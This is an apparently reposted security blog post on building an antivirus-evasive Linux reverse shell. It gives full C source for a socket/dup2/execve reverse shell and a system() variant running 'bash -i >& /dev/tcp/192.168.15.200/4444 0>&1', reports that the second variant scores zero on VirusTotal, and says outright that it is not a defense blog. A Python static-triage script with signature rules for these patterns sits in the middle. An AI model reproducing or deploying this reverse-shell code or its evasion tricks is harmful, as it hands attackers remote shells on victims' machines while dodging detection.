From Shell to Stealth: Building AV-Evasive Binary
The article describes a way of evading antivirus detection by changing how the code is implemented. The initial version of the reverse-shell trojan was detected by several vendors because it made the socket calls directly, but a modified version that goes through `system()` and bash's `/dev/tcp` feature evaded static analysis. 2025-12-15 08:39:25 Author: infosecwriteups.com (view original) Reads: 7

The Backdoor Architect

What if antivirus detection isn’t about what you write… but how you hide it?

In this blog series, we will walk through the process of developing a simple reverse shell payload, mutating its binary, and watching the detection count drop to single digits.

This is not a defense blog. It is about thinking like an attacker: learning how AV engines detect malware, and how far you can go to fool them.

Let's begin:

I have written a small program which is pretty straightforward, no tricks: connect back to the attacker over TCP, point the standard file descriptors at the socket, and exec a shell.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <arpa/inet.h>

int main() {
    int sockfd;
    struct sockaddr_in sa;

    /* Address of the attacker's listener on port 4444 (deliberately no error checks) */
    memset(&sa, 0, sizeof(sa));
    sa.sin_family = AF_INET;
    sa.sin_port = htons(4444);
    sa.sin_addr.s_addr = inet_addr("ATTACKER_IP/HOST_IP");

    /* Open a TCP socket and connect back */
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    connect(sockfd, (struct sockaddr *)&sa, sizeof(sa));

    /* Point stdin, stdout and stderr at the socket */
    dup2(sockfd, 0);
    dup2(sockfd, 1);
    dup2(sockfd, 2);

    /* Replace this process with a shell; it inherits the redirected descriptors */
    char * const argv[] = {"/bin/sh", NULL};
    execve("/bin/sh", argv, NULL);

    return 0;
}

After compiling it into a binary with

gcc binary.c -o BIN

and uploading BIN to VirusTotal, it was flagged as malicious by 8 vendors.


Now let's add a small twist. We change the code, and trust me, you will be shocked by the results.

#include <stdlib.h>

int main() {
    /* Same effect, but bash does the networking: its /dev/tcp/HOST/PORT
       pseudo-file opens the TCP connection and the redirections tie an
       interactive bash to it. The binary itself only imports system(). */
    system("/bin/bash -c 'bash -i >& /dev/tcp/192.168.15.200/4444 0>&1'");
    return 0;
}

This serves the same purpose as the code above, i.e. it spawns a reverse shell, but when we build the binary and upload it to VirusTotal,
it is not flagged as malicious or suspicious by any vendor; in fact some are unable to process the file at all.


Weird, isn't it? Let's look at the reason for this different treatment of two programs that have the same malicious purpose.


The first version (socket, connect, dup2, execve ...) is a well-known reverse shell pattern. It is static and reliable, it has actually been used in malware, and so it is well covered by signatures. The engines that scan a VirusTotal upload rely mostly on static analysis (signature and heuristic based detection), and from that point of view the two builds look very different:
1st version: raw socket calls + execve. It is "binary native": the import table lists socket, connect, dup2 and execve, next to the string "/bin/sh", and that combination is the signature.
2nd version: calls /bin/bash via system(). The import table holds only system(); the reverse shell exists only as a command string that bash interprets at run time.

So the first version is a very common pattern, while the second uses system(), which is not uncommon in legitimate programs, and /dev/tcp, a bash feature that is often seen in legitimate scripts and tools.
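To see what a static scanner actually sees in each build, here is an added example (my own code, not from the post or from any vendor): a pure-Python ELF triage script that lists the dynamic imports and printable strings of a binary and applies a signature-style rule along the lines the explanation above describes. The rule sets, the verdict names and the `build_min_elf` sample builder are assumptions for illustration; run `python3 triage.py BIN` against either compiled version, or run it with no argument to see the constructed samples classified.

```python
"""Static triage of an ELF reverse shell: dynamic imports plus strings.

Added example, not code from the original post. It reads the dynamic
symbol table (.dynsym/.dynstr) of a 64-bit little-endian ELF and its
printable strings, then applies a small signature-style rule modelled
on the indicators the post says static engines key on. The rule sets
and verdict names are assumptions, not any vendor's real signatures.
"""
import re
import struct
import sys

SHT_DYNSYM = 11        # section type of the dynamic symbol table
SHN_UNDEF = 0          # st_shndx of an imported (undefined) symbol
SHDR = "<IIQQQQIIQQ"   # Elf64_Shdr layout
SYM = "<IBBHQQ"        # Elf64_Sym layout


def elf_imports(data: bytes) -> list[str]:
    """Names of undefined dynamic symbols, i.e. the functions imported from libc."""
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("not a 64-bit little-endian ELF")
    (e_shoff,) = struct.unpack_from("<Q", data, 0x28)
    e_shentsize, e_shnum = struct.unpack_from("<HH", data, 0x3A)
    sections = [struct.unpack_from(SHDR, data, e_shoff + i * e_shentsize)
                for i in range(e_shnum)]
    imports = []
    for sh in sections:
        sh_type, sh_offset, sh_size, sh_link, sh_entsize = sh[1], sh[4], sh[5], sh[6], sh[9]
        if sh_type != SHT_DYNSYM:
            continue
        entsize = sh_entsize or 24
        strtab = sections[sh_link]                     # sh_link points at .dynstr
        strs = data[strtab[4]:strtab[4] + strtab[5]]
        for j in range(sh_size // entsize):
            st_name, _info, _other, st_shndx, _val, _sz = struct.unpack_from(
                SYM, data, sh_offset + j * entsize)
            if st_shndx != SHN_UNDEF or st_name == 0:
                continue
            end = strs.index(b"\x00", st_name)
            imports.append(strs[st_name:end].decode("ascii", "replace"))
    return imports


def printable_strings(data: bytes, min_len: int = 4) -> list[str]:
    """Same idea as the `strings` tool: runs of printable ASCII."""
    return [m.decode("ascii") for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]


# Assumed indicator sets (illustrative, not a vendor's signature database)
NETWORK = {"socket", "connect", "inet_addr", "inet_pton", "htons"}
FD_REDIRECT = {"dup2", "dup3"}
EXEC = {"execve", "execv", "execvp", "execl", "execlp", "execvpe"}
SHELL_WRAPPER = {"system", "popen"}
SHELL_PATHS = ("/bin/sh", "/bin/bash")


def classify(imports, strings):
    """Return (verdict, evidence). The socket->dup2->execve chain next to a
    shell path is the classic pattern; a lone system() is common in
    legitimate code, so it only counts when paired with a /dev/tcp string."""
    imp = set(imports)
    has_shell = any(p in s for s in strings for p in SHELL_PATHS)
    has_devtcp = any("/dev/tcp/" in s for s in strings)
    evidence = sorted(imp & (NETWORK | FD_REDIRECT | EXEC | SHELL_WRAPPER))
    evidence += ["str:shell-path"] * has_shell + ["str:/dev/tcp"] * has_devtcp
    if imp & NETWORK and imp & FD_REDIRECT and imp & EXEC and has_shell:
        return "reverse_shell.native", evidence
    if imp & SHELL_WRAPPER and has_devtcp:
        return "reverse_shell.devtcp", evidence
    if has_devtcp or (imp & NETWORK and imp & EXEC):
        return "suspicious", evidence
    return "clean", evidence


def triage(path: str):
    with open(path, "rb") as f:
        data = f.read()
    return classify(elf_imports(data), printable_strings(data))


def build_min_elf(names):
    """Constructed sample input: a skeletal, non-loadable ELF64 holding only a
    .dynstr/.dynsym pair that imports `names`, so the parser can be exercised
    without a compiler."""
    dynstr = b"\x00" + b"".join(n.encode() + b"\x00" for n in names)
    syms, off = b"\x00" * 24, 1                     # index 0 is the null symbol
    for n in names:
        syms += struct.pack(SYM, off, 0x12, 0, SHN_UNDEF, 0, 0)   # STB_GLOBAL | STT_FUNC
        off += len(n) + 1
    dynstr_off = 64
    dynsym_off = dynstr_off + len(dynstr)
    shoff = dynsym_off + len(syms)
    shdrs = struct.pack(SHDR, *([0] * 10))                                           # 0: null
    shdrs += struct.pack(SHDR, 0, 3, 0, 0, dynstr_off, len(dynstr), 0, 0, 1, 0)      # 1: .dynstr
    shdrs += struct.pack(SHDR, 0, SHT_DYNSYM, 0, 0, dynsym_off, len(syms), 1, 1, 8, 24)  # 2: .dynsym
    ehdr = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8       # ELFCLASS64, little-endian
    ehdr += struct.pack("<HHIQQQIHHHHHH", 2, 62, 1, 0, 0, shoff, 0, 64, 0, 0, 64, 3, 0)
    return ehdr + dynstr + syms + shdrs


if __name__ == "__main__":
    if len(sys.argv) == 2:
        print(triage(sys.argv[1]))
    else:   # no file given: classify the two constructed samples
        v1 = build_min_elf(["socket", "connect", "dup2", "execve", "inet_addr", "htons"])
        print(classify(elf_imports(v1), ["/bin/sh"]))
        print(classify(["system"], ["/bin/bash -c 'bash -i >& /dev/tcp/192.168.15.200/4444 0>&1'"]))
```

One caveat this makes visible: the second build still carries the whole bash one-liner, `/dev/tcp/` included, as a plain string in the binary, so a string rule like the one above finds it even though the post's VirusTotal upload came back clean. What the `system()` variant evades is the import and call-pattern signature of the native chain, not a run of `strings`.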

Since we have, to a degree, evaded static analysis, let's see whether the binary also evades sandbox detection.

I uploaded my BIN file without any mutations to Hybrid Analysis, and it was flagged as malicious.


🚀 In the next part of this series, I'll take this exact reverse shell and begin mutating it, with no crypters and no encoders, just binary-level changes. The goal: drop detection rates without altering functionality.

Can simple mutations really fool antivirus?

Stay tuned :).


Source: https://infosecwriteups.com/from-shell-to-stealth-building-av-evasive-binary-4220d7011af9?source=rss----7b722bfd1b8d---4